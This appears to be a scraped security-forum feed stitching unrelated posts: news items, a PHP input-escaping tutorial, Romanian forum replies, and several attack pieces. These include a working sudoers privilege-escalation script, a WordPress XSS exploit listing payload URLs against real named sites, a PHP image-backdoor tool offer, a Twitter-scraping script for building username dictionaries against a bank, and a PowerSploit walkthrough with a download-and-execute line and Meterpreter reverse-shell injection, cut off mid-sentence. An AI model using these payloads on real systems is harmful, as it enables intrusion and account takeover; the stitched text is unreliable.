(Enable sudo) #!/bin/bash -e cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules cat <<EOF >/tmp/r00t.sh echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules rm /tmp/r00t.sh EOF chmod +x /tmp/r00t.sh echo "sudo will be available after reboot" sleep 2 reboot ## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6 Source

@cubedjno1 in primul rand ca sa modifici indexul ( deface ) unui site trebuie sa obtii aces la acel site ( accesul ne-autorizat intr-un sistem informatic se pedepseste ) ar insemna INFRACTIUNE ( nimeni de pe aici nu se ocupa cu asa ceva ) atata timp cat site-ul nu e al tau nu te putem ajuta. Intrebarea e copilareasca.

Introduction In this part of the series, we are going to examine the different ways to escape HTML characters in PHP in order to add security to your web project. We will also give a brief introduction to PHP’s Perl-compatible regular expressions and show how they can be used for input validation. We are also going to examine PHP 5?s built-in input validation and filtering methods (focusing mostly on filter_var). Transforming HTML characters If we have some code, for example a search engine in our website which responds to get parameters and has the following snippet: SNIPPET 1 A legitimate user might get a page resembling something like this: However, any user is going to be able to add tags to the queries and at the very least change drastically the way your page is formatted. For example, he can target particular browsers and send links with malicious GET parameters which would load external JavaScript files. Above is an example of how we can easily change both HTML and CSS on the page (a relatively harmless example). htmlspecialchars To combat this, we can use htmlspecialchars(), htmlentities() or strip_tags(); htmlspecialchars() takes a string and as optional parameters – ‘flags’, the ‘encoding’ to be used when converting the characters and a ‘double encoding’ option which is set to true by default and when turned off forces PHP not to encode existing HTML entities. A sample usage would prevent such XSS vulnerabilities and show the tags instead of applying them: SNIPPET 2 However, htmlspecialchars only changes the ampersand, double quotes, and less and greater than symbols by default. Thus, we could still get undesired effects. For example, here is a sample way to apply tags when the single quotes are not escaped. Suppose we have the following snippet: SNIPPET 3 A legitimate request would look like this: The line just adds a link to the page that points to an HTML file (it would be dynamically generated) named after the sought keyword and displays the keyword as the text child node of the anchor. You can see that the $query variable is passed to the anchor and to the text which contains the escaped with htmlspecialchars() input. However, consider if the user tries to see whether the single quote is also escaped and types something like: http://localhost:8079/Tests/index.php?q=Chocolate’ style=’font-size:5em’ Then the user has successfully closed our anchor tag and added an arbitrary attribute. He can then try to add inline JavaScript and keep on testing for ways to exploit the vulnerability. Figure 1: After the single quote exploit Figure 2: Legitimate request (the anchor before the exploit) To fix this, we just pass the ENT_QUOTES flag. SNIPPET 4 After we escape the single quotes as well, this vulnerability vanishes. To transform an escaped string containing markup to markup, again we use: htmlspecialchars_decode($query); Strip Tags If you want to be more radical, you can remove all HTML and PHP tags from a string or remove only a selection of them. The built-in function strip_tags() takes a string in which to remove the tags and optionally another string that pinpoints which tags are allowed. SNIPPET 5 The above code results in all tags being removed from the string. Optionally, we can allow any tag we want, but we have to do some manual escaping as users can enter whatever attributes they want. Of course, contemporary browsers have XSS protection, but there are still clients with older systems that could be targeted with such malicious links. SNIPPET 6 We get an error in the console telling us that the XSS Auditor did not execute the script on up to date Chrome, but this would not be necessarily the response all users will get. Htmlentities Another function you can use is htmlentities() The difference between htmlspecialchars and htmlentities is that htmlentities translates all HTML characters entity equivalents to the particular entities. This basically mean that it applies also to entities such as © (the copyright symbol), € (the euro symbol) and all others. For example, if we use htmlspecialchars() and enter the euro sign we will get the following result: However, if we use htmlentities, the euro character will be properly translated to its relevant HTML entity: It is it important to know the default flag of htmlentities() is ENT_COMPAT, which only converts double quotes (single quotes are not translated like they are in htmlspecialchars()). Therefore, you also have to use ENT_QUOTES where appropriate: SNIPPET 7 Validating input For most purposes the built-in function filter_var can be used. It is available in servers with greater than 5.2.0 version of PHP. It takes a variable or static input and returns false on failure and the filtered data on success. We can use it for validation and sanitization of input. It has to be mentioned that filter_var’s validation mechanisms do not only tell you if the input is valid but also sanitize it by removing the illegal characters. Below is an example of how it works: SNIPPET 8 This script will display that the email is legit if it is a valid email or display that the email is invalid if it is not. There are also validation filters for Booleans (FILTER_VALIDATE_BOOLEAN) which returns true only when the input is one of the following string combinations: “1? “true” “on” “yes” In every other string value it will return false. Another validation filter is for floating point numbers (FILTER_VALIDATE_FLOAT) which does not return false when: The input is a numeric floating point value (Example: 22.2) The input is a string containing a floating point value (Example: “22.2?, ’22.2?) Optionally, you can pass an option – FILTER_FLAG_ALLOW_THOUSAND would allow a thousand separator such as a comma (,). FILTER_FLAG_ALLOW_SCIENTIFIC would allow the number to be in scientific notation (e,E) and there is also FILTER_FLAG_ALLOW_FRACTION. The FILTER_VALIDATE_INT filter would return the filtered integer or false on failure to extract an integer. There are flags to allow octal and hexadecimal numbers (FILTER_FLAG_ALLOW_OCTAL and FILTER_FLAG_ALLOW_HEX) and the ability to extract a number from a specified range. Here is a sample: Options are passed in a two-dimensional array. The parent array contains the ‘flags’ index and ‘options’ is a nested array with all options where the key is the option name and the value is the value that the option should have. Here is how we can validate an integer to be between 1 and 100 and allow hexadecimal values. When we pass 120 – false (or 0) is returned and we get a message that the number is invalid: Your int 0 is invalid. Redirect to form. If we enter 85, 85 is stored in $int and we get this statement: Your int 85 is legit. Save it into the database. Similarly, if we use a hexadecimal value below 100 (let’s say 10), the integer also passes the validation: $int = filter_var("0xA", FILTER_VALIDATE_INT, $options); We are going to show one last example with the URL filter: SNIPPET 10 We are validating an URL and passing a flag to allow only URLs with a query string attached to them (a GET parameter). We get the following response: Your URL is invalid. Redirect to form. If we instead try the following URL, we will get a positive response: $url = filter_var("http://www.dimoff.biz/?id=1", FILTER_VALIDATE_URL, $options); Your URL Dimoff - Web Consultant (Web Design and Development) | Dimoff.biz is legit. Save it into the database. The drawback of the validation is that internationalized domain names would always fail validation (only Latin URLs will pass the test – those containing ASCII characters). There are also filters to validate regular expressions and IP addresses (both IPv4 and IPv6). You can check filter_var_array(), which can filter multiple variables inserted in an array at once. 3.1 Validation through regular expressions There are times when the built-in validations are not sufficient or do not include the validation you require. In such cases you can use preg_replace, preg_match, preg_match_all or preg_grep to do the job. For example, you may want to allow both Bulgarian and American zip codes. However, Bulgarian zip codes consist of 4 digits, whereas American zip codes consist of 5 digits. To do this you can use regular expressions: SNIPPET 11 This regular expression tests if the input starts with a number which is repeated 4 or 5 and times and then ends. Here are some tests: Your zip code 23135 is legit. Save it into the database. Your zip code 2313 is legit. Save it into the database. Your zip code 231 is invalid. Redirect to form. Your zip code 231352 is invalid. Redirect to form. 3.2 Regular Expressions 101 Regular expressions in PHP must start and end with the same delimiter (usually /expression/ is used). ^ checks whether the input starts with something. $ checks whether the input ends with something. A value in square brackets [ ] means one of a particular character, for example [Abc] means the input can either be A or b or c. [A-Z] means the input can be a single character anything between A to Z, for example M or D. Uppercase and lowercase characters differ, so you would have to use [A-Za-z] if you wanted any alphabetic character. Similarly you could use 0-9 or d (which is almost the same but it includes some other characters). ? means the character preceding it can be repeated 0 or one time. + means it can be repeated one or more times. * means the item can be repeated 0 or more times. Alternatively you can provide a minimum number of repetitions [A-Z]{10} ( at least 10 characters) or a minimum and maximum number of characters [0-9]{4,5}. . stands for any character (.? would mean any character zero or one times). To escape these characters that are used within regular expressions and test for their literal character, you use backslash ( ). For example, #[A-Z+]#. There are also some escaped characters with special meanings such as d for digit and s for space. Characters enclosed in brackets signify that the values should be captured for future use. For example, you may try the following regular expression: preg_replace(“/([0-9]{4,5})-([A-Z]+)/”, “($1)$2?, $input); If you give it a string such as “5432-PA”, it will transform it to become (5432)PA. Preg_replace takes a regular expression as a first argument, the replacement string as second, and the variable to look into as third. In the replacement string, $0 would give the whole original string, $1 would be the first bracketed item, $2 the second and so on. Also, a way to filter input is using the ^ symbol in the beginning of square brackets in a preg_replace call. It would mean replace everything different than the values following the caret (^). For example, preg_replace(“/[^w]/”, “”, $input); would cause input such as <script>alert()</script> to be filtered to “scriptalertscript” w essentially matches all word characters and we are saying to replace all non-word characters with nothing. Conclusion We have covered some essential practices when working with input and we hope that you can start creating applications that are a little bit more secure and robust, or refactor existing projects by making them more secure with filter_var, regular expressions, or by filtering possible HTML coming from inputs. Source

A vulnerability at the heart of Apple’s Mac OS X systems—one thus far only partially addressed by Apple—opens the door to the installation of malicious firmware bootkits that resist cleanup and give hackers persistent, stealthy control over a compromised Mac. The research is the work of a reverse engineering hobbyist and security researcher named Trammel Hudson, who gave a talk at the recent 31C3 event in Hamburg, Germany, during which he described an attack he called Thunderstrike. Thunderstrike is a Mac OS X bootkit delivered either through direct access to the Apple hardware (at the manufacturer or in transport), or via a Thunderbolt-connected peripheral device; the latter attack vector exposes vulnerable systems to Evil Maid attacks, or state-sponsored attacks where laptops are confiscated and examined in airports or border crossings, for example. The end result is the installation of malicious firmware on an Apple machine that would survive reinstallation of OS X or replacement of the Solid State Drive (SSD). Thunderstrike is undetectable, Hudson said, and can be used for root access to an infected computer, putting all of its data and web traffic at risk for interception and monitoring. Hudson began a dialogue with Apple about his findings in 2013 and Apple has addressed the issue with updated firmware shipping in MacMinis and iMac Retina computers. Macbooks, however, remain vulnerable because they are subject to downgrade attacks where an attacker could force older firmware vulnerable to this attack to run Thunderstrike, he said. Thunderstrike’s persistence, unlike other bootkits that would be wiped upon a re-installation of the operating system, for example, is due to its ability to write to the flash ROM on the motherboard, meaning that there’s nothing a software refresh would do to wipe it. Hudson’s bootkit takes advantage of a vulnerability in how Apple computers deal with peripheral devices connected over Thunderbolt ports during a firmware update. In these cases, the flash is left unlocked, allowing an Option ROM, or peripheral firmware, to run during recovery mode boots. It then has to slip past Apple’s RSA signature check. Apple stores its public key in the boot ROM and signs firmware updates with its private key. The Option ROM over Thunderbolt circumvents this process and writes its own RSA key so that future updates can only be signed by the attacker’s key. The attack also disables the loading of further Option ROMs, closing that window of opportunity. A weaponized version of this attack would have free ring0 reign over the system. Hudson said this the first OS X firmware bootkit he is aware of. “Since it is the first OS X firmware bootkit, there is nothing currently scanning for its presence. It controls the system from the very first instruction, which allows it to log keystrokes, including disk encryption keys, place backdoors into the OS X kernel and bypass firmware passwords,” Hudson said. “It can’t be removed by software since it controls the signing keys and update routines. Reinstallation of OS X won’t remove it. Replacing the SSD won’t remove it since there is nothing stored on the drive.” Hudson said the possibility exists that Thunderstrike attacks could also eventually be done remotely given the Dark Jedi Coma research presented at 31C3 by Corey Kallenberg and Rafal Wojtczuk. Their talk exposed vulnerabilities in UEFI—the replacement for BIOS—and System Management Mode, a privileged execution mode on Intel machines. The vulnerabilities uncovered by Kallenberg and Wojtczuk allow an attacker to re-flash firmware and run their own malicious firmware. The Department of Homeland Security this week issued an advisory about these vulnerabilities Source

Up until a few weeks ago, the number of people outside of North Korea who gave much thought to the Internet infrastructure in that country was vanishingly small. But the speculation about the Sony hack has fixed that, and now a security researcher has taken a hard look at the national browser used in North Korea and found more than a little weirdness. The Naenara browser is part of the Red Star operating system used in North Korea and it’s a derivative of an outdated version of Mozilla Firefox. The country is known to tightly control the communications and activities of its citizens and that extends online, as well. Robert Hansen, vice president of WhiteHat Labs at WhiteHat Security, and an accomplished security researcher, recently got a copy of Naenara and began looking at its behavior, and he immediately realized that every time the browser loads, its first move is to make a request to a non-routable IP address, http://10.76.1.11. That address is not reachable from networks outside the DPRK. “Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office,” Hansen wrote in a blog post detailing his findings. “The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!” What that does is give North Korean officials the ability to control exactly what traffic gets in and out of the country’s network. “One can presume that the intent of this huge local country-wide LAN would be to limit what users can access and also limit what can be accessed by outsiders,” Hansen said by email. That’s only one piece of the puzzle, though. Hansen also looked at the way the Naenara browser handles things such as email, calendars, certificates and other elements and found a lot of other oddities. For one, the country has implemented a system that enables it to determine precisely when a user installs the anti-phishing and anti-malware lists from the DPRK’s home base. “That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into the browser,” Hansen said. Also, any time a browser crashes, the report is sent back to the main DPRK IP address, giving the country valuable insights into what’s causing crashes, and perhaps, new vulnerability data. “Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company,” Hansen said. All email also is routed through the main IP address in North Korea, as do calendar entries. And, unsurprisingly, the Naenara browser only accepts one certificate–the one provided by the government. “That means it would be trivial to man in the middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and contents can be monitored by them,” Hansen said. Researchers have known for a long time that the North Korean government exerts serious control over the online movements of its citizens, but the details of how that system works provide an interesting look at the technical measures the country employs. “It is odd that they can do all of this off of one IP address. Perhaps they have some load balancing but ultimately running anything off of one IP address for a whole country is bad for many reasons. DNS is far more resilient, but it also makes things slower, in a country with Internet connectivity that is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits off core functions by URL to various clusters of machines,” Hansen said. Source

Within hours on Thursday of WhiteHat Security releasing its Aviator browser to open source, a remote code execution vulnerability was disclosed, along with a handful of other coding issues that Google security engineers said jeopardized the security and privacy of Aviator’s users. Google’s public disclosure and subsequent public criticism over social media of Aviator–which is built upon the Chromium code base, the same one used by Google to build the Chrome browser–kicked off an tense back and forth between the $50-billion search giant and the small-by-comparison private security company WhiteHat responded this afternoon, acknowledging the bugs in its code, which it concedes may not be as “elegant” as Google Chrome’s. But the company does push back against Google’s assertion that the use of the Disconnect browser extension in Chrome, and tweaks to some privacy settings provide the same experience as Aviator. “We have made changes in Aviator that are beyond configuration, such as the browser’s ability to stop referring URLs from being sent cross domain as well as always being in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what [Google] is suggesting,” said Hansen. “Most people do not know the first thing about Disconnect and therefore, they don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.” Aviator was built with anonymity and security in mind. By default, it doesn’t allow tracking of a user’s browsing, and WhiteHat doesn’t have any partnerships with advertisers or tracking companies. It also has DuckDuckGo set as the default search engine, a major change from most other browsers, which typically have Google or Bing as the default. DuckDuckGo doesn’t save any search history data from users or perform any tracking. Google engineer Tavis Ormandy, however, yesterday wasted no time diving into the Aviator code. he tweeted late yesterday afternoon that he’d discovered a remotely exploitable bug in the browser. WhiteHat founder and CEO Jeremiah Grossman said through his Twitter account that Google did not contact his company about the vulnerability or any of the issues described in a Google-Plus post by Justin Schuh, a Google security engineer working on the Chrome security team. “You probably shouldn’t be using the WhiteHat Aviator browser if you’re concerned about security and privacy,” Schuh wrote, pitting Chrome against Aviator throughout the post as a safer and better-resourced secure-browsing option. The decision to go open source, WhiteHat Labs vice president Robert Hansen said, was a long time coming and was spurred on by privacy conscious users, including some in the Tor community, who wanted a similar browser built on Chromium. “For them, it would be a lot easier to start with a more secure browser that had removed a lot of the Google specific anti-privacy stuff, than to re-invent the wheel. So why not Aviator?,” Hansen wrote yesterday in making the open source announcement. Releasing Aviator to open source, Hansen said, was in part an effort to enlist the security community’s help in hardening the browser and perhaps narrowing the gap between it and Chrome, the security of which is key to supporting Google’s $50 billion annual revenue from online advertising. Schuh, meanwhile, pointed out that a number of changes made in Aviator from the Chromium code base that complicate the integration of security fixes. “That’s why Aviator is perennially at least two major releases behind Chrome, and ships with dozens of publicly disclosed vulnerabilities that are already fixed in the stable Chrome release,” Schuh said. “Had these branding changes been made more carefully, this simply wouldn’t be a problem and Aviator would be able to pull upstream changes and benefit from the security work being done by the Chromium Project.” Schuh said the number of technical changes made in Aviator were relatively few, but created problems beyond Ormandy’s vulnerability. “The added code doesn’t seem to have been written with a sufficient understanding of how Chrome works, or with adequate regard for security,” Schuh said, pointing to one area where debug breaks were disabled. “In Chrome that call is expected to safely terminate sandboxed processes in a whole slew of situations where the process cannot safely recover, but in Aviator all of those cases have now been turned into potentially exploitable vulnerabilities,” he said. Schuh said a number of the changes made to Aviator are already available in the Chrome Disconnect extension, and with the benefit of incorporating any security fixes in Chromium. “In the end, I really hope this criticism is taken constructively, and provides some useful context for people who want to enhance Chrome,” Schuh said. “I’m always impressed by the size and passion of the Chromium community, and blown away by the number of people who contribute to and build projects on top of our codebase. But at the same time it’s very important that care be taken in those efforts to preserve the safety of end-users, even more so when making such bold claims about security and privacy.” Source

This is a simple script to infect images with PHP Backdoors for local file inclusion attacks. Download

@jetus ,,Anonymous" nici nu exista, astia sunt doar niste copii ce s-au filmat pentru a primi atentie... Oricum e destul de amuzanta ,,stirea" desi era mai bine daca o postai la Offtopic

Microsoft is to stop providing free Patch Tuesday notices to non-premier customers in a move labelled by some as "an assault on IT teams". The change relates to the Advance Notification Service (ANS) that provided organisations with information about upcoming Patch Tuesday releases. ANS gave businesses the chance to assess how the updates could affect their systems, and stop any update that could cause problems. However, Chris Betz, senior director of Microsoft's Security Response Center, said in a blog post that the company believes the majority of customers do not need the ANS information and let the updates happen automatically. “Customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimised testing and deployment methodologies,” he said. “While some customers still rely on ANS, the vast majority wait for Update Tuesday, or take no action, allowing updates to occur automatically.” As a result ANS will be made available only to those paying for the privilege. “We will provide ANS information directly to Premier customers and current organisations involved in our security programmes, and will no longer make this information broadly available through a blog post and web page,” said Betz. The decision drew anger from some in the security community. Ross Barrett, senior manager of security engineering at Rapid7, was scathing about the decision. “This is an assault on IT and IT security teams everywhere. Making this change without any lead up time is simply oblivious to the impact this will have in the real world,” he said. “Microsoft is basically going back to a message of ‘just blindly trust’ that we will patch everything for you. Honestly, it's shocking.” Wolfgang Kandek, chief technology officer of Qualys, also spoke up in defence of the ANS information. “I have always thought that our customers were interested in the information contained in ANS, but we will see how that works out,” he said. IT professionals on Twitter were also sceptical about the decision. Source

Salut Razvan, frumoasa prezentare! // tu esti baiatu cu blog-ul de acum 6 ani

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability | |[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/" | |[*] Date : Date: 2015-01-08 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*]Vendor Homepage : https://pluginu.com/slideoptinprox/ | |[*] Tested on: Windows 8.1,Kali Linux | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS] | |-------------------------------------------------------------------------| |[*] Proof: | |[*] http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E | |[*] http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E| |-------------------------------------------------------------------------| |[*] Discovered By : 4L1R3Z4 | |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| Source

Many corporations are not aware of the types of data that can be found and used by attackers in the wild. The information that you will be able to find will vary from target to target, but will typically include items such as IP ranges, domain names, e-mail addresses, public financial data, organizational information, technologies used, job titles, phone numbers, usernames and much more. The primary goal of the passive gathering stage is to gather as much actionable data as possible while at the same time leaving few or no indicators that anyone has searched for the data. It takes time and patience to sort through web pages, perform Google hacking, and map systems thoroughly in an attempt to understand the infrastructure of a particular target. In this article, let’s assume that we have a task to perform a penetration test for an online banking system to verify the ability of guessing valid usernames and passwords. If you were a hacker, what would you do? Speaking for myself, first I would write up a quick script to create a dictionary file for potential usernames. Secondly, I would find out the company password policy (like password length, number of special character and so on), and based on that, I would build my own password dictionary file. Finally, I would automate the process to see if I can get a correct password or maybe perform a DoS and block the account after X numbers of failed attempts!! Many users are using the same username for their bank account, Facebook, Twitter, and other social media. So let’s forge a small Python script to illustrate how an attacker could use an ordinary publicly available information and build up a dictionary file which contains Twitter followers for Arab Bank. At the time of writing this article, Arab Bank has around 24,027 followers. Let’s bring them up! **Disclaimer: all of actions explained in this article are counted under Passive Information Gathering and considered legitimate. We just spotlight a smart way of data collection.** Build your own dictionary file Twitter and many social websites have something called API < Application Programming Interface > which allows a programmer to write his own code to interact with Twitter and Get/Post information from/to Twitter. Fortunately we have many libraries in Python that make my job much easier, so all I need to do is to register in Twitter developers and use the developer ID/keys in my script to run. The registration process should be something similar to these snapshots: Tweepy is a Python third-party library allow us to parse Twitter’s data. Installing Tweepy is pretty easy: hkhrais@Hkhrais:~$ sudo apt-get install python-pip hkhrais@Hkhrais:~$ sudo pip install tweepy Source Code import tweepy import time #insert your Twitter keys here consumer_key ='blah blah blah' consumer_secret='blah blah blah' access_token='blah blah blah' access_secret='blah blah blah' auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_secret) api = tweepy.API(auth) list= open('/<a title="home" href="http://resources.infosecinstitute.com/">home</a>/hkhrais/Desktop/list.txt','w') if(api.verify_credentials): print 'We sucessfully logged in' user = tweepy.Cursor(api.followers, screen_name="arabbankgroup").items() while True: try: u = next(user) list.write(u.screen_name +' n') except: time.sleep(15*60) print 'We got a timeout ... Sleeping for 15 minutes' u = next(user) list.write(u.screen_name +' n') list.close() The code is almost self explanatory. I passed consumer/token keys to function “OauthHandler” to identify/authenticate myself to Twitter, and after that I asked to get the followers ID for ‘arabbankgroup’ and store it in variable “user”. According to the Twitter development paper, there’s a limit for how many requests a program can ask. In the case of getting the followers ID, we should wait around 15 minutes, otherwise a limit excess exception will show up. tweepy.error.TweepError: [{'message': 'Rate limit exceeded', 'code': 88}] Execution Output hkhrais@Hkhrais:~/Desktop/Tweets$ sudo python Twitter.py [sudo] password for hkhrais: We successfully logged in We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes ... We got a timeout ... Sleeping for 15 minutes Traceback (most recent call last): File "Twitter.py", line 31, in <module> u = next(user) File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 181, in next self.current_page = self.page_iterator.next() File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 64, in next raise StopIteration StopIteration hkhrais@Hkhrais:~/Desktop/Tweets$ Note that the last exception indicates iteration completion, which means we’ve grabbed the whole list of followers’ usernames the result: Conclusion Intelligence gathering requires careful planning, research, and, most importantly, the ability to think like an attacker. With a small Python script (around 25 lines), we could retrieve 24,027 followers’ usernames for @arabbankgroup which can be used as a good dictionary of usernames. Keep in mind that this script gets very handy, especially if our target usernames are non English! References • Twitter API https://dev.twitter.com/docs/twitter-libraries • Tweepy library https://pypi.python.org/pypi/tweepy/ Source

1. Introduction HTTPS is used to make communication between the server and the browser secure. However, a problem occurs when an HTTPS page loads HTTP content: this is called mixed content vulnerability. There are two types, active and passive, discussed in this article. Finally, a demo page with this vulnerability is presented along with an exemplary detection method. 2. SSL/TLS – protecting the communication channel First, we need to answer the following questions before discussing mixed content vulnerability: What is protected by HTTPS? What security properties are offered by HTTPS? What is the difference between HTTPS and HTTP? HTTPS uses SSL/TLS, which works between the application and the transport layers of the OSI model. SSL/TLS is used to protect the data of the application layer. The following properties are achieved when HTTPS is used: authentication, data integrity, confidentiality. This is fine for protection of data in the communication channel between the server and the browser. The problem appears when an HTTPS page loads HTTP content – HTTP is insecure, and attackers can read/modify HTTP traffic. 3. HTTPS page loading HTTP content Protection of the communication channel between the server and the browser is one issue. Another issue is the content that is sent in this channel. Imagine an HTTPS page that loads the script over HTTP (mixed content vulnerability). Then the browser sends an HTTP request to get this script. Remember that HTTP is insecure – the attacker can read or modify the traffic. Let’s assume there is an attacker in the middle of the communication. The attacker sees the request and waits for the response from the server. When the response comes, the attacker modifies it and forwards to the user’s browser. This is how a man-in-the-middle (MITM) attack works. As a consequence, the content of the attacker’s choice is executed in the user’s browser. 4. Mixed content vulnerability (passive and active) Let’s consider two cases – an HTTPS page which loads an image over HTTP (the first case), and an HTTPS page which loads the script via HTTP (the second case). Let’s discuss the first case. When the image is loaded over HTTP, the attacker can change this image. As a result, the appearance of the site is influenced. This is not very dangerous, because the attacker doesn’t change the behavior of the HTTPS page. However, data integrity is not preserved. This is an example of mixed passive content. Let’s now discuss the second case. This is a more dangerous scenario, because changing the script affects the behavior of the HTTPS page. This is an example of mixed active content. 5. Demonstration and detection of mixed content vulnerability Microsoft prepared a demo with mixed content vulnerability [1] – you can go there and play with it (the certificate is invalid at the moment of writing this article, but it doesn’t matter from the perspective of mixed content vulnerability demonstration). You will also need a proxy to see requests/responses and tamper with responses (simulation of MITM attack). You can use Burp Proxy for this purpose. Burp Proxy is a part of Burp Suite, which is an integrated platform for web site security testing [2]). It turns out that the aforementioned HTTPS demo page loads the script via HTTP (just take a look at the source of this site). However, you don’t have to do this analysis manually. You can use the Opera browser, for example, to see the mixed content vulnerability warnings (go to the Console in Developer Tools). Below I present them for the aforementioned demo page (mixed active content in the red frame; the rest is mixed passive content). 6. Summary HTTPS is used to protect the data of the application layer of the OSI model. However, the problem appears when the HTTPS page loads HTTP content, also known as mixed content vulnerability. Because HTTP is not secure, the attacker can launch a MITM (man-in-the-middle) attack. As a consequence, the attacker has an impact on the HTTP content that is delivered to the user’s browser. Two types of mixed content vulnerability were discussed – mixed active content (it can change the behavior of the HTTPS page) and mixed passive content (it doesn’t change the behavior of the HTTPS page, but affects its integrity). Finally, it was presented how the Opera browser can be used to detect mixed content vulnerability. Finally, don’t hesitate to contact me on Twitter (@dawidczagan) if you have any questions or want me to discuss other security topics of your interest. References [1] Mixed content vulnerability – demo page prepared by Microsoft https://ie.microsoft.com/testdrive/browser/mixedcontent/assets/woodgrove.htm (access date: 5 January 2015) [2] Burp Suite Burp Suite (access date: 5 January 2015) Source

PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test. To get the latest version of PowerSploit, visit this URL: https://github.com/mattifestation/PowerSploit If you have GIT, then you can simply run the following command to get all files from the github repository: git clone https://github.com/mattifestation/PowerSploit.git To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions. Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it. For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python: python -m SimpleHTTPServer Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/ PowerSploit has categorized all the scripts in a pretty clear and organized manner: Category Description Antivirus Bypass Find bytes of a file which has a matching signature in antivirus. Code Execution Used to execute code on victim machine. Exfiltration Manipulate and collect information & data from victim machine(s). Persistence Maintain control to machine by adding persistence to scripts. PE Tools Handy PowerShell cmdlets for enumeration. Recon Perform reconnaissance tasks using victim machine. Reverse Engineering Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal. Script Modification Create and manipulate scripts on victim machine. In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration). Install and run a PowerShell script: IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”) This command when run in PowerShell will install that PowerShell for the current process of PowerShell only. Invoke-Shellcode This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk. We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using: Run the above command in a PowerShell window to install “Invoke-Shellcode” script. To get some information about the module type: Get-Help Invoke-Shellcode Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell: Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell. Please note that at the time of writing this article, only two Metasploit payloads are supported: windows/meterpreter/reverse_http windows/meterpreter/reverse_https If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process. Inject in an existing process: Get Process ID (PID) of a process using “Get-Process”. Note that the “Id” field is the Process ID (PID) of the corresponding process name. Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload. After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below: Inject in a new process: Create a new hidden process and inject the payload into it: And we got a Meterpreter shell on the attacking machine: Invoke-DllInjection This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk. We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using: Generate the Metasploit Meterpreter DLL and download it on the server: Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice. Create a process in hidden mode and inject the DLL into it. We received a successful Meterpreter shell on the attacking machine: Find-AVSignature This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily 